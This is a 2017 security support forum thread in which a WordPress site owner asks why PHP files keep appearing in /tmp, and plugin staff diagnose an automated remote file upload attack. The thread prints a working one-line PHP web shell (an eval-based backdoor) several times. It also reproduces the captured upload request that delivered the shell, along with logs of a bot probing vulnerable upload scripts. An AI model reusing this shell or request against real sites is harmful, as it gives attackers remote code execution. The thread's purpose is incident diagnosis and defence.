Topic: Malicious file uploaded to tmp directory

Malicious file uploaded to tmp directory

This topic has 15 replies, 3 voices, and was last updated 6 years, 9 months ago by AITpro Admin.

Viewing 15 posts - 1 through 15 (of 16 total)

1 2 →

Author

Posts
July 20, 2017 at 8:13 am #33685
The Eldest Geek
Participant
I’m having some successful attacks to my server and its running BPS current version.
For example on Jul 15 20:22 , a file ‘phpC7RCyS’ was uploaded into the /tmp folder under my website
this file contains:
```
<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300
```
another file from the tmp directory (few seconds later) contains the same information
from my httpd access file I see:
```
[Sat Jul 15 20:22:56 2017] [error] [client 195.154.217.116] File does not exist: /var/www/theeldestgeek.com/web/wp-content/plugins/Login-wall-etgFB
[Sat Jul 15 20:23:05 2017] [error] [client 195.154.217.116] client denied by server configuration: /var/www/theeldestgeek.com/web/wp-content/uploads/sfn.php
[Sat Jul 15 20:23:06 2017] [error] [client 195.154.217.116] File does not exist: /var/www/theeldestgeek.com/web/wp-content/plugins/jquery-html5-file-upload
```
It appears the sfn.php file was used (it appears at another time when another file was uploaded).
BPS does not seem to have stopped it. what can this file DO? and should I be worried about it?

thanks!
July 20, 2017 at 9:17 am #33690
AITpro Admin
Keymaster
Do you have the BPS Pro Plugin Firewall activated? The BPS Pro Plugin Firewall blocks these types of Remote File upload attacks. If you have BPS free then this BPS POST Attack Protection bonus custom code will also block these types of forced remote file upload attacks (eventually the POST Attack Protection code will be a full GUI feature in BPS – either 13.3 or 13.4): https://forum.ait-pro.com/forums/topic/post-request-protection-post-attack-protection-post-request-blocker/ See method of this attack below. When you add the POST Attack Protection code and when the next attack is blocked it will tell you which plugin or theme is being used/exploited in this attack.

Method of attack: forced remote file upload by exploiting common security vulnerabilities in plugins or theme upload forms.
Protection|Prevention: BPS Pro: Plugin Firewall. BPS free & Pro: BPS POST Attack Protection bonus custom code.
```
[403 POST Request: January 14, 2017 12:25 pm]
Event Code: PSBR-HPR
Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 195.154.250.248
Host Name: mail.gimson.info
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
REQUEST BODY: --(UploadBoundary)
Content-Disposition: form-data; name="upload[]"; filename="sfn.php"
Content-Type: text/php

<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300
--(UploadBoundary)
Content-Disposition: form-data; name="cmd"

upload
--(UploadBoundary)
Content-Disposition: form-data; name="target"

l1_Lw
--(UploadBoundary)
Content-Disposition: form-data; name="html"

1
--(UploadBoundary)
```
General Information about the PHP /tmp folder:
The temporary directory used for storing files when doing file upload. Must be writable by whatever user PHP is running as. If not specified PHP will use the system’s default.

The /tmp directory should have read, write and execute rights for everyone.

Files will, by default be stored in the server’s default temporary directory, unless another location has been given with the upload_tmp_dir directive in php.ini. The server’s default directory can be changed by setting the environment variable TMPDIR in the environment in which PHP runs. Setting it using putenv() from within a PHP script will not work. This environment variable can also be used to make sure that other operations are working on uploaded files, as well.

tmp files are uploaded via PHP’s HTTP POST upload mechanism). If the file is valid, it will be moved to the filename given by destination.

If filename is not a valid upload file, then no action will occur, and move_uploaded_file() will return FALSE.

If filename is a valid upload file, but cannot be moved for some reason, no action will occur, and move_uploaded_file() will return FALSE. Additionally, a warning will be issued.

The file will be deleted from the temporary directory at the end of the request if it has not been moved away or renamed.

The tmpfile() function creates a temporary file with a unique name in read-write (w+) mode and returns a file handle.
July 20, 2017 at 10:27 am #33691
The Eldest Geek
Participant

I’ve done what you have suggested. another annoying thing anytime I update a theme (I’m using Avada and they have a built in patcher) I’m seeing files being quarantined! I assume by restoring them I’m restoring the UPDATED file not the one before the update, right?

thought BPS was supposed to be able to handle these correctly?

cdb.
July 20, 2017 at 10:44 am #33692
AITpro Admin
Keymaster

AutoRestore Automation will automatically turn off AutoRestore, backup any new files and turn itself back on if you are updating or installing a theme from your WordPress Dashboard using the WordPress API since your identity/user is known. If you are manually uploading files via FTP or remotely installing files from a remote location then AutoRestore Automation will not be able confirm your identity. See the AutoRestore|Quarantine Standard Procedural Steps when manually modifying or uploading files: http://forum.ait-pro.com/forums/topic/autorestore-quarantine-guide-read-me-first/#procedural-steps

My guess would be that that Avada Theme built-in patcher does not hook into the WordPress API. ARQ Automation listens to the WordPress API for things like WordPress Automatic Updates, manual or Shiny WP Core, plugin and theme updates and installations. So if the Avada Theme built-in patcher does not hook into the WordPress API then use the AutoRestore|Quarantine Standard Procedural Steps when manually modifying or uploading files.
July 23, 2017 at 3:12 am #33695
The Eldest Geek
Participant
I have the BPS Pro Firewall turned on but the attacks continue!
```
403 GET Request: July 22, 2017 - 1:53 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 91.205.173.48
Host Name: vm1.d-waste.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: theeldestgeek.com
REQUEST_URI: /wp-content/uploads/bb.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36

[403 GET Request: July 22, 2017 - 5:19 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 62.210.162.118
Host Name: 62-210-162-118.rev.poneytelecom.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/uploads/sfn.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

[403 GET Request: July 22, 2017 - 5:19 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 62.210.162.118
Host Name: 62-210-162-118.rev.poneytelecom.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/uploads/sfn.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

[403 GET Request: July 22, 2017 - 5:19 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 62.210.162.118
Host Name: 62-210-162-118.rev.poneytelecom.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/uploads/sfn.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

[403 GET Request: July 22, 2017 - 5:19 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 62.210.162.118
Host Name: 62-210-162-118.rev.poneytelecom.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/uploads/sfn.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

[403 GET Request: July 22, 2017 - 5:19 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 62.210.162.118
Host Name: 62-210-162-118.rev.poneytelecom.eu
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/uploads/sfn.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

[403 GET Request: July 22, 2017 - 6:26 pm]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
Solution: N/A - Hacker/Spammer Blocked/Forbidden
REMOTE_ADDR: 79.168.231.184
Host Name: a79-168-231-184.cpe.netcabo.pt
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /
QUERY_STRING:
HTTP_USER_AGENT: Wget/1.19.1 (linux-gnu)

[405 HEAD Request: July 23, 2017 - 12:23 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS-HEAD - HEAD Request Blocked
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 199.58.164.136
Host Name: 199.58.164.136
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: HEAD
HTTP_REFERER: http://uptime-gamma.net/www.theeldestgeek.com
REQUEST_URI: /
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)

[405 HEAD Request: July 23, 2017 - 12:53 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS-HEAD - HEAD Request Blocked
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 120.76.114.201
Host Name: 120.76.114.201
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: HEAD
HTTP_REFERER:
REQUEST_URI: /wp-login.php
QUERY_STRING:
HTTP_USER_AGENT:

[405 HEAD Request: July 23, 2017 - 3:26 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS-HEAD - HEAD Request Blocked
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 199.58.164.142
Host Name: 199.58.164.142
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: HEAD
HTTP_REFERER: http://uptime-alpha.net/eldestgeek.com
REQUEST_URI: /
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)

[405 HEAD Request: July 23, 2017 - 5:22 am]
BPS Pro: 13.2
WP: 4.8
Event Code: BFHS-HEAD - HEAD Request Blocked
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 74.115.214.131
Host Name: 74.115.214.131
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: HEAD
HTTP_REFERER: http://uptime-delta.net/www.theeldestgeek.com
REQUEST_URI: /
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)
```
————- and at the same time phpxxx files are created in the /tmp folder (and left0
```
-rw------- 1 web8 client0 107 Jul 22 05:19 phpFMDo37
-rw------- 1 web8 client0 107 Jul 22 05:19 phpI6hjTt
-rw------- 1 web8 client0 107 Jul 22 05:20 phpIwIfO4
-rw------- 1 web8 client0 107 Jul 22 05:20 phpJ9my36
-rw------- 1 web8 client0 107 Jul 22 05:20 phpkQEeBD
-rw------
```
and these files all contain: <?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300

whats going on please??? is this actually harming me?
July 23, 2017 at 3:43 am #33696
rafaelmagic
Participant

Stuff is being blocked with 403 error codes. That is a good thing.

Also it seems that UpTimeRobot is being blocked because you have to Allow HEAD requests.

Now about your TMP files, change your Passwords. Check your Uploads folder for junk.

Is your theme clean? Are you using plugins that are current?
July 23, 2017 at 10:07 am #33697
AITpro Admin
Keymaster
What is happening is this: BPS Pro UAEG is currently blocking the moved .php files (or at least any direct requests to .php files) in your WordPress /uploads folder from being accessible to the hacker. So the hack is being stopped by UAEG and is not proceeding any further to hack your actual website or hosting account. The Remote file uploads are still not being blocked and the files are being force uploaded to your /tmp folder and then automatically moved (or maybe not actually moved) to your WordPress /uploads folder, which is the normal process of handling PHP POST file uploads.

Assuming the BPS Pro Plugin Firewall is working correctly on your website, the Remote file POST must be using an upload form that is not a Plugin upload form. The upload form could be a Theme upload form or some other upload form somewhere else on your website. Do these steps below:

1. Go to the BPS htaccess File Editor page > click the Your Current Root htaccess File tab > scroll down in your Root htaccess file contents > copy your # WP REWRITE LOOP START htaccess code (see example below) into this BPS Root Custom Code text box: 8. CUSTOM CODE WP REWRITE LOOP START.
2. Get the BPS POST Attack Protection code from here: https://forum.ait-pro.com/forums/topic/post-request-protection-post-attack-protection-post-request-blocker/ and copy and paste it below your #WP REWRITE LOOP START htaccess code that you just copied into BPS Custom Code.
3. Click the Save Root Custom Code button.
4. Go to the Security Modes page and click the Root folder BulletProof Mode Activate button.

IMPORTANT Note: You should check all of your forms on your website (contact form, etc) to see if any of them are being blocked by the POST Attack Protection code and will need to add whitelist rules in the BPS POST Attack Protection code to allow/whitelist those forms from being blocked by the POST Attack Protection code. Very important: If you whitelist a particular form (especially a form that is an upload form) and the /tmp file uploads start happening again then you will have found the vulnerable upload form that the hacker is exploiting and you will need to figure out what you want to do next. ie delete or replace or fix/secure that form, etc.

Example # WP REWRITE LOOP START htaccess code
Note: Do not use this example code. Your WP Rewrite Loop start code may be different so use/copy your actual code.
```
# WP REWRITE LOOP START
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]

# The POST Attack Protection code will go below your WP Rewrite Loop start code here
```
July 23, 2017 at 10:13 am #33698
AITpro Admin
Keymaster

Actually what would be better is to NOT check any of your forms on your website and let the hackerbot do another Remote POST file upload, which will be blocked and logged in your BPS Security Log file. So that you will know exactly which form on your website has a vulnerability and that is being exploited in this attack. Then decide what action you want to take next. ie delete or replace or fix/secure that form. After all hackerbot attacks have been stopped then you would want to check all other POST forms on your website to make sure they are not being blocked by the BPS POST Attack protection code and whitelist those forms using whitelist rules in the POST Attack Protection code.

Also it is important to note that this attack is most likely automated using a Bot. So since the Bot is seeing some partial success it is continuing to repeat the automated attack. Once the POST Attack Protection code has been added and the Bot is blocked at the POST Remote file upload stage then the Bot will move on after X number of failed POST Remote file upload attempts and continue its automated attacks on other websites.
July 29, 2017 at 5:25 am #33748
The Eldest Geek
Participant
I have implemented the bonus code etc – but the uploads continue!!!
I keep finding these phpxxx files in the /tmp folder and nothing indicates to me WHAT is doing this or how to stop it.
clearly the posts continue so I’m not blocking them right?
what are these actually DOING??? Is there any danger to my server??

–snip–
```
192.168.2.1 - - [29/Jul/2017:00:09:57 -0400] "POST /wp-cron.php?doing_wp_cron=1501301397.6621930599212646484375 HTTP/1.1" 200 191 "http://www.conciergecareva.com/wp-cron.php?doing_wp_cron=1501301397.6621930599212646484375" "WordPress/4.8; http://www.conciergecareva.com"
69.197.145.178 - - [29/Jul/2017:00:38:06 -0400] "GET / HTTP/1.1" 301 249 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:09 -0400] "GET / HTTP/1.1" 200 737428 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:11 -0400] "POST /wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=c2ZuLnBocA%3D%3D&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d HTTP/1.1" 301 456 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:13 -0400] "GET /wp-content/plugins/sfn.php HTTP/1.1" 301 368 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
192.168.2.1 - - [29/Jul/2017:00:38:08 -0400] "POST /wp-cron.php?doing_wp_cron=1501303088.3894369602203369140625 HTTP/1.1" 200 191 "http://www.conciergecareva.com/wp-cron.php?doing_wp_cron=1501303088.3894369602203369140625" "WordPress/4.8; http://www.conciergecareva.com"
69.197.145.178 - - [29/Jul/2017:00:38:14 -0400] "POST / HTTP/1.1" 200 737515 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:16 -0400] "GET /wp-content/uploads/sfn.php HTTP/1.1" 403 1493 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:17 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 389 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:19 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/sfn.php HTTP/1.1" 301 398 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:20 -0400] "GET /wp-content/plugins/revslider/sfn.php HTTP/1.1" 301 378 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:21 -0400] "POST /license.php HTTP/1.1" 500 39420 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:22 -0400] "POST /uploadify/uploadify.php?folder=/ HTTP/1.1" 500 40880 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:23 -0400] "POST /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass= HTTP/1.1" 500 43800 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:24 -0400] "GET /sfn.php HTTP/1.1" 301 349 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:25 -0400] "POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1" 500 39420 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:26 -0400] "POST /wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php HTTP/1.1" 301 414 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:27 -0400] "GET /wp-content/uploads/files/guest/sfn.php HTTP/1.1" 301 380 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:28 -0400] "POST /wp-content/plugins/woocommerce-product-options/includes/image-upload.php HTTP/1.1" 301 414 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:29 -0400] "GET /wp-content/uploads/2017/7/sfn.php HTTP/1.1" 301 375 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:30 -0400] "POST /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 500 40880 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:31 -0400] "GET /?feed=rss2 HTTP/1.1" 301 352 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:32 -0400] "GET /feed/ HTTP/1.1" 200 2327 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:33 -0400] "GET /wp-login.php HTTP/1.1" 200 4610 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.197.145.178 - - [29/Jul/2017:00:38:34 -0400] "POST /wp-login.php HTTP/1.1" 200 4759 "-" "Mozilla/5.0 (compatible; MSIE 9.0;
```
—snip
and the files in my savefolder (under root)
```
-rw------- 1 web64 client0 107 Jul 29 00:38 phpcTfQCh
-rw------- 1 web64 client0 107 Jul 29 00:38 phpe558uP
-rw------- 1 web64 client0 107 Jul 29 00:38 phpezZer5
-rw------- 1 web64 client0 107 Jul 29 00:38 phpwiAEtT
-rw------- 1 web64 client0 107 Jul 29 00:38 phpzcvBor
```
—snip–
so 5 files were uploaded successfully!
and the contents: (they all seem to be pretty much identical)
<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300

so my question is what is this DOING?? and how can I really stop it?
clearly the culprit is 69.197.145.178 but what is he affecting? all I can do up to now is just move the php files out of tmp folder.
some help would be MOST appreciated as I really need to understand (and stop) whats going on?
you offer any paid onsite visits?

thanks
July 29, 2017 at 9:07 am #33749
AITpro Admin
Keymaster

Host: Verizon Fios Business: http://fios.verizon.com/fios-business.html
Server Type: in-house: Apache/2.2.15 (CentOS)
Known Security Vulnerabilities Apache/2.2.15: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-93077/Apache-Http-Server-2.2.15.html
Offers Hosting: Yes, offers hosting and website design/development to customers.

Based on your Apache log entries the attacks are random POST attacks that follow typical Bot attack patterns attempting any/all possible exploits. There is not one specific point of attack. The POST attacks result in HTTP Status codes: 500 and 301 and not 200 OK.

Logical guess based on the log entries: There is a flaw or vulnerability with your Apache/2.2.15 (CentOS) build/compile/installation or your PHP server build/compile/installation that is allowing any/all file uploads to be uploaded to your /tmp folder no matter what the random attack vector is. Or in other words, any/all attempts to upload files from any POST Remote file upload is allowing files to be uploaded to your /tmp folder. That should obviously not be allowed to happen. Only valid HTTP POST form uploads made using a POST Form should be allowed to upload files to a /tmp folder.

Recommendations: Check your httpd.conf and vhosts conf files for configuration mistakes and fix them. Check your php.ini file directives for any configuration mistakes and fix them. Upgrade your Apache/2.2.15 (CentOS) to Apache 2.4. Upgrade your PHP server to PHP7.
July 29, 2017 at 9:14 am #33752
The Eldest Geek
Participant

thanks for suggestions – but I am running ISPPROTECT (which is scanning the whole /var/www tree and what is flagging these files and I’m not seeing any other evidence of actual access or damage.

Are these files dangerous? and what would they actually DO? or are they just a nuisance but I can just do a cron job and delete them all routinely?

and surely I’m not the first person to see this happening? why would such a HUGE flaw in either apache or php5 not be well known at this point???

and would anyone here be able to maybe login ssh and help me track this nasty down? if so what would costs be?
July 29, 2017 at 9:28 am #33754
AITpro Admin
Keymaster

The files while they exist in the /tmp folder are not dangerous. The normal automated PHP process of handling uploaded files is that when a valid HTTP POST occurs using a POST Form a file is uploaded to the /tmp folder and is automatically moved to another location such as the WordPress /uploads folder. Since the files are not automatically being moved anywhere that the uploaded files can be accessed or used to exploit or hack the websites then the hack/flaw is stopping at that point before it is becoming dangerous. The flaw somewhere is that the files should not be allowed to be randomly uploaded at all by making a Remote file upload POST Request to any/all URI’s. Only valid HTTP POST Requests made using a POST Form should be allowed to upload files. Successful Remote file uploads are accomplished by exploiting a POST Form that has a flaw/security vulnerability in the Form code that allows hacker files to be uploaded via that flawed/vunerable Form. So the root problem is logically that either your Apache server or your PHP server has a configuration mistake or a flaw somewhere. If the attacks were not typical random Remote file upload attacks that we see every single day > all day long and the attacks were instead targeting a particular specific target (Form, URI, etc) then that would indicate a flaw/security vulnerability in a particular plugin or theme form. What is occurring on your server is than any/all random typical Remote file upload attacks are allowed to upload files to your server’s /tmp folder – that should not be happening.

We don’t offer free or paid services for Server rebuilds/assessments/configurations/etc. Most likely just upgrading your servers will do the trick. That is where I would personally start. 😉
July 29, 2017 at 9:53 am #33757
The Eldest Geek
Participant

upon reflection, I’m hosting many sites – and only a FEW are exhibiting this behaviour. would not they all if it was a bot attack?

and I’ve looked at the vhost and php.ini files dont see anything remarkable. what sort of configuration errors might I look for?

and upgrading 2.2 to 2.4 might break a LOT alas….
July 29, 2017 at 10:41 am #33758
AITpro Admin
Keymaster

I can’t tell you why the bot is only attacking some sites and not other sites. 69.197.145.178 is a colocation server hosted in a Kansas City Missouri colocation facility and has been flagged publicly as a known SpamBot and HackerBot IP address. Logically you would be looking for anything that is related to anything that handles/processes file uploads. You can disable these functions which are used in Remote file upload attacks and other attacks in your php.ini file: disable_functions = system, exec, shell_exec, passthru, proc_open, proc_close, proc_get_status, proc_terminate, show_source, popen, pclose, pcntl_exec, posix_kill, posix_mkfifo, ftp_connect, ftp_login, ftp_exec, mysql_pconnect.
You can do Google searches for search terms like: apache 2.2 remote file upload… We can only generally offer ideas, but could not possibly tell you exactly what needs to be done/fixed on your server. 😉
July 29, 2017 at 12:37 pm #33760
The Eldest Geek
Participant
but is there anyway to know if this is DANGEROUS to me? any clue as to what they are actually able to do to damage the site or the server? thats whats really concerning me.

also – I’m having some questions about quarantining files. for example on one of the attacked sites on june 8 some files were quarantined out of the wp-admin folder:
```
rw-r--r-- 1 web64 client0 3871 Jun 8 12:59 media-audio-widget.js
-rw-r--r-- 1 web64 client0 1440 Jun 8 12:59 media-audio-widget.min.js
-rw-r--r-- 1 web64 client0 4396 Jun 8 12:59 media-image-widget.js
-rw-r--r-- 1 web64 client0 1616 Jun 8 12:59 media-image-widget.min.js
-rw-r--r-- 1 web64 client0 6351 Jun 8 12:59 media-video-widget.js
-rw-r--r-- 1 web64 client0 2595 Jun 8 12:59 media-video-widget.min.js
-rw-r--r-- 1 web64 client0 36782 Jun 8 12:59 media-widgets.js
-rw-r--r-- 1 web64 client0 12348 Jun 8 12:59 media-widgets.min.js
-rw-r--r-- 1 web64 client0 11223 Jun 8 12:59 text-widgets.js
-rw-r--r-- 1 web64 client0 3148 Jun 8 12:59 text-widgets.min.js
[root@ns9 widgets]#
```
is this malicious? or was this a normal wp upgrade? and any reason these would have been quarantined?
thanks again for all the help!
Author

Posts

Viewing 15 posts - 1 through 15 (of 16 total)

1 2 →

You must be logged in to reply to this topic.

BulletProof Security Forum

Malicious file uploaded to tmp directory

Search Forums

Topic Tags